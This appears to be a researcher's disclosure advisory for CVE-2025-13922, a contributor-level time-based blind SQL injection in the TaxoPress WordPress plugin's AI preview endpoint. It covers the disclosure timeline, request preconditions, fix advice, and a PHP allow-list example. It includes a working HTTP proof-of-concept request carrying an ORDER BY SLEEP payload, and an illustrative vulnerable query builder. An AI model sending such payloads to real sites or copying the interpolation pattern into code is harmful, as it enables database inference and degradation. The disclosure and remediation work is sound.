CVE-2025-13922 is an authenticated, time-based blind SQL injection affecting the WordPress plugin TaxoPress (plugin slug simple-tags). The issue sits in the TaxoPress AI preview feature and is triggered through an AJAX workflow, allowing a logged-in user with Contributor-level access (or higher) and AI metabox permissions to inject SQL into an ORDER BY clause, commonly demonstrated with delay payloads such as SLEEP() for an observable timing impact. According to the National Vulnerability Database, the vulnerable parameter is existing_terms_orderby, and the issue affects all versions up to and including 3.40.1. The plugin's deployment footprint is significant (WordPress.org reports 50,000+ active installations), so even a "PR:L" authenticated SQLi matters in the real world, where Contributor/Author accounts are common on editorial sites.
| Field | Value |
| --- | --- |
| CVE | CVE-2025-13922 |
| Plugin Version | Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI <= 3.40.1 |
| Severity | High |
| All Time Downloads | 5 777 010 |
| Active installations | 50 000+ |
| Publicly Published | December 5, 2025 |
| Last Updated | December 5, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13922 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-tags/tag-category-and-taxonomy-manager-ai-autotagger-with-openai-3401-authenticated-contributor-sql-injection-via-order-by-clause |
Timeline
| Date | Event |
| --- | --- |
| November 24, 2025 | Plugin testing and vulnerability detection in the Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI has been completed |
| November 24, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 5, 2025 | Registered CVE-2025-13922 |
Discovery of the Vulnerability
The vulnerability is a classic “dynamic SQL fragment” problem: the code path building the taxonomy term query interpolates raw ordering fragments (notably ORDER BY components) derived from user input, without a strict allow-list for permitted columns or direction tokens. The CVE description explicitly ties the flaw to insufficient escaping and lack of parameterization, enabling attackers to append SQL into existing queries and perform time-based inference or cause performance degradation. Wordfence’s record aligns with the same mechanism (time-based blind SQLi via existing_terms_orderby in the AI preview AJAX endpoint) and confirms the practical fix guidance: update to 3.41.0 or newer.
Understanding SQL Injection attacks
This bug is not an "unauthenticated SQLi". It is authenticated and gated by how the AI preview handler is invoked. The NVD entry notes that the attacker must be authenticated with Contributor-level access (or higher) and have AI metabox permissions. At the code level there is an additional operational precondition that matters for reliable reproduction: the preview handler rejects requests unless it has post context, so the request must supply preview_post=<existing_post_id> or provide a non-empty post_title/post_content; otherwise it short-circuits with an error such as {"status":"error","content":"Posts content and title is empty."} before the vulnerable SQL path is reached. That "must-have context" requirement does not reduce severity much in real deployments (contributors can usually reference at least one accessible post ID), but it is critical for a clean PoC and for developers verifying the fix.
Exploiting the SQL Injection Vulnerability
To exploit CVE-2025-13922, an attacker with Contributor-level (or higher) session cookies sends the following request to admin-ajax.php.
POC:
```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=st_posts
X-Requested-With: XMLHttpRequest
Origin: http://127.0.0.1
Connection: keep-alive
Cookie: Contributor+_cookies
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

action=taxopress_ai_preview_feature&nonce=st_admin_localize.ai_nonce_from_profile.php&preview_ai=existing_terms&preview_taxonomy=post_tag&preview_post=1&existing_terms_orderby=(SELECT+SLEEP(7))&existing_terms_order=ASC
```
Even though this is “ORDER BY injection,” the security implications are still meaningful. Time-based blind SQLi can enable data inference (extracting information bit-by-bit via timing), can degrade database performance under repeated requests, and can amplify into a reliability and availability issue on busy sites if exploited at scale. The fact that the attacker is authenticated reduces the blast radius to sites with untrusted or semi-trusted contributors, but that’s exactly the profile of many publishing and multi-author WordPress installations. Additionally, because the injection is in a backend feature (AI preview/metabox), it is easy for defenders to miss during routine perimeter testing, yet it can still be reached by low-privileged accounts that are frequently created for collaboration or content submission.
Recommendations for Improved Security
The right fix is not "more sanitization" but strict allow-listing and safe query construction. For any ORDER BY construction, the code should map user input to a finite set of permitted columns (e.g., name, count, term_id) and enforce the direction as either ASC or DESC, rejecting everything else. If the logic must support multiple order keys, it should assemble them from validated tokens only, never from raw strings. Beyond that, upgrading to a patched release is the cleanest mitigation path; Wordfence indicates this issue is patched and recommends updating to TaxoPress 3.41.0 or newer. On the operational side, treat "AI metabox access" as a privileged feature: restrict it to trusted roles, and review which roles are granted those permissions in editorial environments where contributor accounts might be numerous.
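The following is an added example, not TaxoPress code and not the plugin's actual fix. It contrasts the "dynamic SQL fragment" pattern described in the Discovery section (the ordering fragment interpolated straight from the request) with the allow-list approach recommended above, and it goes slightly beyond the single-key case by accepting a comma-separated list of order keys, each validated as a token. The table aliases, column map and function names are assumptions chosen for illustration; the inputs at the bottom are constructed and include the delay-payload shape from the advisory.

```php
<?php
// Added example (not TaxoPress code): building an ORDER BY clause from untrusted
// request parameters with a strict allow-list instead of string interpolation.
// Table aliases, the column map and all function names are assumptions.
declare(strict_types=1);

const TERMS_BASE_QUERY =
    "SELECT t.term_id, t.name, tt.count FROM wp_terms t "
    . "JOIN wp_term_taxonomy tt ON tt.term_id = t.term_id "
    . "WHERE tt.taxonomy = 'post_tag' ";

// Vulnerable pattern (illustrative): the request values become SQL text as-is,
// so "(SELECT SLEEP(7))" is executed as part of the query.
function build_terms_query_vulnerable(string $orderby, string $order): string
{
    return TERMS_BASE_QUERY . "ORDER BY {$orderby} {$order}";
}

// Hardened pattern: user input is only ever a lookup key into a fixed map of
// permitted columns; the direction must be exactly ASC or DESC.
const TERMS_ORDERBY_ALLOWLIST = [
    'name'    => 't.name',
    'count'   => 'tt.count',
    'term_id' => 't.term_id',
];

// Returns [list of column expressions, direction] or null when any token is
// not allow-listed. Rejecting is deliberate: do not "clean" and continue.
function validate_terms_orderby(string $orderby, string $order): ?array
{
    $columns = [];
    foreach (explode(',', $orderby) as $token) {
        $key = strtolower(trim($token));
        if (!array_key_exists($key, TERMS_ORDERBY_ALLOWLIST)) {
            return null;
        }
        $columns[] = TERMS_ORDERBY_ALLOWLIST[$key];
    }
    $dir = strtoupper(trim($order));
    if ($dir !== 'ASC' && $dir !== 'DESC') {
        return null;
    }
    return [$columns, $dir];
}

// Only allow-listed literals ever reach the SQL text. A null result means the
// AJAX handler should answer with an error instead of running a query.
function build_terms_query_safe(string $orderby, string $order): ?string
{
    $validated = validate_terms_orderby($orderby, $order);
    if ($validated === null) {
        return null;
    }
    [$columns, $dir] = $validated;
    $parts = array_map(fn(string $c): string => "{$c} {$dir}", $columns);
    return TERMS_BASE_QUERY . 'ORDER BY ' . implode(', ', $parts);
}

// Constructed inputs for a stand-alone run (php this_file.php).
$cases = [
    ['name', 'ASC'],
    ['count,name', 'desc'],
    ['(SELECT SLEEP(7))', 'ASC'],          // payload shape from the advisory
    ['name', 'ASC, (SELECT SLEEP(7))'],    // injection via the direction field
];
foreach ($cases as [$orderby, $order]) {
    $vulnerable = build_terms_query_vulnerable($orderby, $order);
    $safe       = build_terms_query_safe($orderby, $order);
    printf("input: orderby=%s order=%s\n", $orderby, $order);
    printf("  vulnerable -> %s\n", substr($vulnerable, strpos($vulnerable, 'ORDER BY')));
    printf("  safe       -> %s\n", $safe === null ? 'REJECTED' : substr($safe, strpos($safe, 'ORDER BY')));
}

// Self-check: the payload is rejected and a valid multi-key request is built.
$ok = build_terms_query_safe('(SELECT SLEEP(7))', 'ASC') === null
    && build_terms_query_safe('count,name', 'desc') === TERMS_BASE_QUERY . 'ORDER BY tt.count DESC, t.name DESC';
echo 'self-check: ' . ($ok ? 'ok' : 'FAIL') . "\n";
```

In a real plugin the allow-listed clause is appended to a query whose data values go through $wpdb->prepare(); WordPress core also ships sanitize_sql_orderby(), which rejects strings that are not plain column/direction lists, but an explicit map of permitted columns as above is stricter and documents exactly which orderings the feature supports.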
By taking proactive measures to address SQL Injection vulnerabilities like CVE-2025-13922, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #SQLi #WebsiteSafety #StayProtected #HighVulnerability
Dmitrii I.
